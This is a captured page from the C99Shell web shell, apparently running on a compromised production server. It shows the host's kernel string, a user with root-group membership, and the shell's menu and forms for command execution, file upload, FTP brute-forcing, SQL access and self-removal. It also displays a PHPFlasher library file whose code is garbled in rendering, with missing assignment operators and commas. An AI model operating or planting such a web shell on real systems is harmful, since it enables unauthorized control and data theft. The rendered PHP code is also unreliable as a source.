!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/php-flasher/flasher/Stamp/   drwxr-xr-x
Free 29.16 GB of 117.98 GB (24.72%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TranslationStamp.php (1.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the PHPFlasher package.
 * (c) Younes KHOUBZA <younes.khoubza@gmail.com>
 */

namespace Flasher\Prime\Stamp;

final class 
TranslationStamp implements StampInterface
{
    
/**
     * @var array<string, mixed>
     */
    
private $parameters;

    
/**
     * @var string|null
     */
    
private $locale;

    
/**
     * @param array<string, mixed> $parameters
     * @param string|null          $locale
     */
    
public function __construct($parameters = array(), $locale null)
    {
        
$order self::parametersOrder($parameters$locale);
        
$parameters $order['parameters'];
        
$locale $order['locale'];

        
$this->parameters $parameters;
        
$this->locale $locale;
    }

    
/**
     * @return array<string, mixed>
     */
    
public function getParameters()
    {
        return 
$this->parameters;
    }

    
/**
     * @return string|null
     */
    
public function getLocale()
    {
        return 
$this->locale;
    }

    
/**
     * @param mixed      $parameters
     * @param mixed|null $locale
     *
     * @return array{parameters: array<string, mixed>, locale: string|null}
     */
    
public static function parametersOrder($parameters = array(), $locale null)
    {
        if (
\is_string($parameters)) {
            
$locale $parameters;
            
$parameters = array();

            @
trigger_error('Since php-flasher/flasher v1.4, passing the locale as first parameter is deprecated and will be removed in v2.0. Use the second parameter instead.'\E_USER_DEPRECATED);
        }

        return array(
'parameters' => $parameters'locale' => $locale); // @phpstan-ignore-line
    
}
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0111 ]--